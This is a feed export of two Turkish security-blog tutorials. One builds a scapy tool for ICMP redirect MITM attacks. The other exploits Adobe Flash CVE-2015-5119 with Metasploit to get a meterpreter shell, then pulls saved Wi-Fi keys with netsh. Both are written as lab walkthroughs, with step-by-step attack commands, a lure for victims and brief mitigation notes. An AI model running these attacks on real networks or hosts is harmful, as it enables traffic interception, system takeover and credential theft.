Cem Onat Karagün, Yazar: CanYouPwnMe! - For Cyber Security Researchers https://canyoupwn.me cypm! Sun, 23 Jul 2017 18:41:56 +0000 tr hourly 1 https://wordpress.org/?v=6.0 https://canyoupwn.me/wp-content/uploads/2016/02/cropped-Başlıksız-1-32x32.png Cem Onat Karagün, Yazar: CanYouPwnMe! - For Cyber Security Researchers https://canyoupwn.me 32 32 TR | ICMP Redirection Spoofing ile MITM ve Bunu Yapan Aracın Geliştirilmesi https://canyoupwn.me/tr-icmp-redirect-saldirisi-kullanarak-mitm/ https://canyoupwn.me/tr-icmp-redirect-saldirisi-kullanarak-mitm/#respond Sat, 07 May 2016 10:06:49 +0000 https://canyoupwn.me/?p=1916 CanYouPwnMe! - For Cyber Security Researchers CanYouPwnMe! - For Cyber Security Researchers - cypm!

Giriş: Sahte ICMP Redirection paketleri ile bir kurbanın ağ trafiğini üzerinize alabilirsiniz ve bunu Arp tablosunda duplication oluşturmadan yapabileceğiniz için bazı arp spoofing tespit yazılımlarını atlatabilirsiniz. Bu yazıda bu yönteme kabaca değinilmiş olup scapy kütüphanesi ile bunu yapan bir araç geliştirilmiştir. ICMP Hakkında: ICMP (Internet Control Message Protocol (Türkçe adıyla Internet Kontrol Mesaj İletişim Protokolü)), […]

TR | ICMP Redirection Spoofing ile MITM ve Bunu Yapan Aracın Geliştirilmesi Cem Onat Karagün

]]>
CanYouPwnMe! - For Cyber Security Researchers CanYouPwnMe! - For Cyber Security Researchers - cypm!

Giriş:
Sahte ICMP Redirection paketleri ile bir kurbanın ağ trafiğini üzerinize alabilirsiniz ve bunu Arp tablosunda duplication oluşturmadan yapabileceğiniz için bazı arp spoofing tespit yazılımlarını atlatabilirsiniz.
Bu yazıda bu yönteme kabaca değinilmiş olup scapy kütüphanesi ile bunu yapan bir araç geliştirilmiştir.

ICMP Hakkında:

ICMP (Internet Control Message Protocol (Türkçe adıyla Internet Kontrol Mesaj İletişim Protokolü)),
geri bildirimler yapmak için kontrol amaçlı kullanılan bir protokoldür.
IP’ nin, hata düzeltme veya raporlama özelliği yoktur. Bu yüzden, bu amaçlar için ICMP kullanılır.
IP(Internet Protokolü) hakkında daha fazla bilgi için buraya başvurulabilir.

ICMP genelde, yok edilen paketlerde, hata oluşumlarında ve paketin gideceği yolun değişeceği zamanlarda bilgilendirme yapılması amacıyla kullanılır.

Komut satırı araçlarından sıkça kullanılan “Ping” ve “Traceroute”(Windows’ta “Tracert”) da ICMP Echo Request ve Reply mesajlarıyla çalışır.

Bir Host’a ping atıldığında neler olduğunu Wireshark vb programlar ile görebilirsiniz:
Bunun için komut satırında,
ping www.google.com
gibi örnek bir komut verdiğinizde wireshark ICMP paketlerini yakalamaya başlayacaktır.
Çerçeve 2 kez tıklayarak açıldığında Internet Control Message Protocol sekmesi altında;
Type:0(Echo Reply) veya Type:8 (Echo Request) Gözükür. Bu ICMP paketlerinin tipini belirler.

Echo request:

CYPM

Echo reply:

CYPM

ICMP paketlerinin farklı tip değerleri vardır. Tamamı için buraya bakılabilir. Bu yazıda sadece 3 tanesi üzerinde durulmuştur, bunlar:
Type:8 (Echo Request)
Type:0 (Echo Reply)
Type:5 (Redirection Required)

 

ICMP Redirection Required Hakkında:

Daha iyi bir ağ geçitinin(gateway) bildirilmesi amacıyla kullanılır. Paketi alan host veya router, routing tablosuna yeni ağ geçidini ekleyecektir(Önlem amaçlı gerekli konfigürasyon yapılmamış ise). 0(Ağ için), 1(Host için), 2(Servis ve ağ için), 3(Servis ve host için) olmak üzere 4 farklı kodu vardır.

Daha iyi anlamak için buradaki görsel faydalı olabilir.
Bir ICMP Redirection Required çerçeve yapısı aşağıdaki gibidir:

null

Bu yazıda bahsedilen özellikler görselde kırmızı olarak sayılar ile belirtilmiştir:
1) Wireshark son kullanıcı için “Redirect for host” olduğunu tespit etmiştir.
2) ıP’ nin başlığında protokol numarası 1 olduğu için ICMP yazmıştır.
3) ICMP’ nin Tipi 5 olduğu için yanına Redirect yazmıştır.
4) Redirect’ in Kodu 1 olduğu için Redirect for host yazmıştır.

 

ICMP Redirection Spoofing Yapan Araç Hakında:

ICMP Redirection saldırısı için kullanılabilinecek araçlardan bazıları aşağıda verilmiştir:

hping, ettercap, bettercap, zarp, scapy, icmp_redirect(BT ve Kali ile kurulu gelmektedir.), icmpush, Sing .

Bu yazıda python scapy kütüphanesi kullanılarak ICMP redirection saldırısı yapacak ufak bir betik kod geliştirilmiştir.

ICMP kullanıldığını anlamanın yolu IP paketinin başlık bilgisine bakmaktır. Eğer protokol alanı 1 ise ICMP
kullanıldığı anlaşılmaktadır. Scapy bu detaylar ile uğraşılmaması için bir çok özelliği beraberinde getirmektedir.

Öncelikle ortadaki adam saldırısı(MITM(Man in the middle)) gerçekleştirilen sistemde kernel ip forward’ in etkinleştirilmesi gerekmektedir, genellikle ” echo “1”> /proc/sys/net/ipv4/ip_forward ” kullanılsa da bu yazıda sysctl konfigürasyonu kullanılmıştır. Sysctl ile ilgili daha fazla manual sayfasından ulaşılabilir.
İlgili komut:

sudo sysctl net.ipv4.ip_forward=1

(Not: -w parametresi kimi zaman gereklidir.)
Ardından scapy terminal üzerinden çağrılabilir yada python etkileşimli kabuğu üzerinde iken kütüphane olarak eklenebilir.
Modüller, “import scapy” ile eklenir ise metodlar scapy.metod() şeklinde kullanılmak zorundadır. Bunun yerine metod() veya fonksiyon() kullanabilmek için modülün:

“from scapy.all import * ” şeklinde eklenmesi gerekmektedir.

Github’ a yazar tarafından eklenmiş kod üzerinde açıklayıcı yorumlar yeterli görülmüş olup yazıda okurun canı sıkılmamak istenmiştir.

Kurulum için verilmesi gereken komutlar sırasıyla:

wget https://raw.githubusercontent.com/cemonatk/My-Tools/master/cypm_icmpredirect.py

ve kullanım için:

python cypm_icmpredirect.py -a eth0 -k 'KURBAN IP ADRESI' -g 'AG GECITI IP ADRESI'

Aracı terminal üzerinden herhangi bir dizinde çalıştırmak için ~bin/ dizini altına kısayol eklenmesi gerekmektedir.
Bunun için cypm_icmpredirect.py kodunun olduğu dizinde iken sırasıyla;

mv cypm_icmpredirect.py cypm_icmpredirect
chmod +x cypm_icmpredirect

cd ~bin/

ln -s ~/KODUN INDIRILDIGI DIZIN/cypm_icmpredirect

komutları verilebilir. Bu aşamanın ardından herhangi bir dizinde iken cypm_icmpredirect komutu ve parametreleri ile program çalışabilir haldedir.

Saldırının Gerçekleştirilmesi:

Kurban tarafında ARP tablosu ilk hali:

dd
Saldırı komutu verince terminal:

ss

 

aaaa
Kurban tarafında ARP tablosu  son hali,

x

Kurban canyoupwn.me adresine bağlanmak isterken; saldırgan makinedeki Wireshark üzerinde görülen DNS istekleri ekran alıntısında gözükmektedir:
x

Sonuç olarak:

  • ICMP Redirection saldırılarına karşı alınabilecek önlemlerden bazıları:
  1. https://docs.oracle.com/cd/E36784_01/html/E36838/icmp-1.html
  2. https://support.microsoft.com/en-us/kb/293626
  3. http://www.itsyourip.com/Security/how-to-disable-icmp-redirects-in-linux-for-security-redhatdebianubuntususe-tested/comment-page-1/
  • Full Duplex ICMP Redirection Saldırıları hakkında detaylı bilgi edinmek için buraya başvurulabilir. Gerçekleştirmek için burada anlatıldığı gibi bettercap kullanılabilir.
  • Aracın kullanımı kodlar veya yazı ile ilgili anlaşılmayan yerler için benimle:
    cem {(At}] canyoupwn ({n0-kta] me” mail adresi üzerinden iletişime geçebilirsiniz.

TR | ICMP Redirection Spoofing ile MITM ve Bunu Yapan Aracın Geliştirilmesi Cem Onat Karagün

]]>
https://canyoupwn.me/tr-icmp-redirect-saldirisi-kullanarak-mitm/feed/ 0
TR | Adobe Flash Player Hacking Team Exploit (CVE-2015-5119) https://canyoupwn.me/tr-hacking-team-exploit-cve-2015-5119/ https://canyoupwn.me/tr-hacking-team-exploit-cve-2015-5119/#respond Wed, 13 Apr 2016 06:30:43 +0000 https://canyoupwn.me/?p=1666 CanYouPwnMe! - For Cyber Security Researchers CanYouPwnMe! - For Cyber Security Researchers - cypm!

Hacking Team ve CVE-2015-5119 hakkında: Bu yazıda, 6 Temmuz 2015′ i 7 Temmuz 2015′ e bağlayan gece sızdırılan 400 GB boyutundaki Hacking Team dosyaları içerisinde bulunan Adobe Flash Player sıfırıncı gün zafiyetlerinden CVE-2015-5119‘ un Metasploit modülü ile sömürülmesi anlatılacaktır. Hacking Team ile ilgili daha fazla bilgiye wikipedia üzerinden; sızdırılmış e-postalara wikileaks üzerinden ve CVE-2015-5119 numaralı Adobe Flash […]

TR | Adobe Flash Player Hacking Team Exploit (CVE-2015-5119) Cem Onat Karagün

]]>
CanYouPwnMe! - For Cyber Security Researchers CanYouPwnMe! - For Cyber Security Researchers - cypm!

Hacking Team ve CVE-2015-5119 hakkında:

Bu yazıda, 6 Temmuz 2015′ i 7 Temmuz 2015′ e bağlayan gece sızdırılan 400 GB boyutundaki Hacking Team dosyaları içerisinde bulunan Adobe Flash Player sıfırıncı gün zafiyetlerinden CVE-2015-5119‘ un Metasploit modülü ile sömürülmesi anlatılacaktır.

Hacking Team ile ilgili daha fazla bilgiye wikipedia üzerinden; sızdırılmış e-postalara wikileaks üzerinden ve CVE-2015-5119 numaralı Adobe Flash Player uzaktan komut çalıştırma zafiyeti hakkında daha fazla bilgiye buradan ulaşılabilir. Hacking Team dosyalarındaki diğer exploitlere de buradan ulaşılabilir.

Adobe Security Bulletin üzerinde bahsedildiği gibi zafiyet, Windows, Macintosh ve Linux işletim sistemlerindeki Adobe Flash Player 18.0.0.194 önceki versiyonlarını etkilemekte ve saldırganın sistem üzerinde hakimiyet kurmasına sebebiyet vermektedir.
Lab ortamı hakkında:

Yazıda, Internet Explorer web tarayıcısı üzerinde Adobe Flash Player 18.0.0 versiyonu çalışan Windows 8.1 Pro işletim sistemi kurulu bilgisayar kurban olarak; Metasploit kurulu gelen Kali Linux 2.0 işletim sistemi de saldırgan olarak kullanılmıştır.

Siz de istediğiniz Flash Player versiyonu buradan indirebilirsiniz. Programların eski versiyonlarını sunan online hizmet oldversion.com da benzeri uygulamalar için oldukça kullanışlıdır. Tarayıcı üzerinde çalışan Flash Player versiyonunu öğrenmek için bu sayfadan Check Now’ a basılabilir.

 

Metasploit’ e yeni modül kurulumu:

  • Swf sample ve modülü  indirip, /usr/share/metasploit-framework/modules (Kali 2.0 için) dizini altında tercihen yeni bir dizine eklemeniz gerekmektedir. Aynı iş kısa yoldan komutlar ile yapılacak olursa sırasıyla:
wget https://raw.githubusercontent.com/rapid7/metasploit-framework/master/data/exploits/CVE-2015-5122/msf.swf

 

wget http://downloads.securityfocus.com/vulnerabilities/exploits/75568.rb

 

mkdir -p /usr/share/metasploit-framework/modules/exploits/hackingteamcypm

 

mv 75568.rb /usr/share/metasploit-framework/modules/exploits/hackingteamcypm/flashcypm.rb

 

mv msf.swf /usr/share/metasploit-framework/modules/exploits/hackingteamcypm/msf.swf

 

rm 75568.rb msf.swf
  • İşlemin ardından PostgreSQL servisi çalışmıyorsa başlatılmalı çalışıyorsa yeniden başlatılmalıdır.
service postgresql start

veya

service postgresql restart
  • Metasploit terminal uygulaması açılıp modüllerin yeniden yüklenmesi sağlanmalıdır. Msfconsole komutları ile ilgili daha detaylı bilgiye buradan ulaşılabilir.
msfconsole
reload_all
  • Metasploit terminal uygulaması msfconsole üzerinden arama yaparak modülün eklendiği teyit edilebilir.
search flashcypm

 

Exploit’ in kullanımı:

Msfconsole üzerinden kurulum aşamasında “search flashcypm” komutu ile araması yapılıp kurulumunun teyit edildiği modülün kullanımı için “use” komutu kullanılır:

use flashcypm

Modül hakkında daha fazla bilgi alabilmek için “info” komutu kullanılabilir.

cypm

 

Modülün gereken parametrelerini öğrenmek için “show options” kullanılır. Burada Required sütunu gerekli olan parametrelere işaret etmektedir. Örneğin URIPATH değeri kullanılması zorunlu değildir. Fakat tercihen yazıda rastgele URIPATH kullanılması yerine “canyoupwnme” kullanılmıştır:

set URIPATH canyoupwnme

Exploitin çalışması için son olarak  “exploit” komutu verilir.

cypm2

Kurbanın linke giriş yapmasına olanak sağlanır(Sosyal mühendislik senaryoları.). Bu yazıda linke tıklanıldığı varsayılarak kurban tarafındaki görüntü eklenmiştir:

cypm

Saldırgan makine üzerindeki msfconsole terminalinde meterpreter oturumunun açıldığı görülmektedir, oturumları listelemek için “sessions” komutu verilir. Oturumu seçmek için ID değerine bakılır, örneğin bu yazıda ID değeri 1 olan oturum seçildiği için “sessions -i 1” komutu verilmiştir:

 

cypm

 

Meterpreter üzerinden ekran görüntüsü, webcam üzerinden resim çekmek veya klavye tuşları kayıt etmek gibi özellikleri kullanmak için “help” komutu kullanılabilir.

MS-DOS Komut satırı için “shell” komutu kullanılmıştır:

cypm

Sistemde başarı ile uzaktan komut çalıştırılmış olup bundan sonra yapılabilecekler saldırganın hayal gücü ile sınırlıdır.

Örneğin, tek komut ile wi-fi şifresinin elde edilmesi:

netsh wlan show profile name=SSID-ADI key=clear | findstr " Key Content"

SSID adını öğrenmek için de:

netsh wlan show interfaces | findstr "Profile"

 

Bonus:

Yazıdan anlaşılabileceği üzere sistem güvenliği adına; gereksiz tüm servislerin kaldırılması, mümkün olduğunca az servise ihtiyaç duyulması ve kullanılan servislerin güncel olması gerekmektedir.

Lokal ağınız dışında uzaktaki bir hedefe yapılan saldırı için router’ ınız (modem) üzerinde port yönlendirme ayarları yapmanız gerekmektedir ve msfconsole üzerinde exploit çalıştırılmadan önce “set SRVHOST” komutu ile router’ ın external IP adresi(internet yoluyla erişilebilen) belirtilmelidir.

Bu da Hacking Team’ in ekonomi sınıfında THY ile uçtuğunun kanıtıdır:
https://wikileaks.org/hackingteam/emails/emailid/830597

 

 

TR | Adobe Flash Player Hacking Team Exploit (CVE-2015-5119) Cem Onat Karagün

]]>
https://canyoupwn.me/tr-hacking-team-exploit-cve-2015-5119/feed/ 0